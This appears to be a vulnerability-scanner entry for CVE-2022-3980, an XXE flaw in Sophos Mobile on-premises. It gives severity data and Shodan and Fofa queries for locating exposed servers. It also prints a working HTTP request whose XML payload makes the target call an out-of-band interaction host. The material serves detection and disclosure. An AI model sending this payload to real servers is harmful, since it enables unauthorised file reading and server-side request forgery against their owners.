| Title | Sophos Mobile managed on-premises - XML External Entity Injection |
|---|---|
| Author | dabla |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. |
| Remediation | Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.86806 |
| CVE ID | CVE-2022-3980 |
| CWE ID | CWE-611 |
| Shodan Query | http.favicon.hash:-1274798165http.title:"sophos mobile" |
| Fofa Query | title="Sophos Mobile"icon_hash=-1274798165title="sophos mobile" |
| Tags | cve cve2022 xxe ssrf sophos vkev vuln |
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
POST /servlets/OmaDsServlet HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 139
Content-Type: "application/xml"
Accept-Encoding: gzip
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://d5jmpk9le0o4s07danp0zyjpszf83zau8.oast.site">%test;]>
<cdl>test</cdl>
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3980.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-3980.pcap
N/AN/A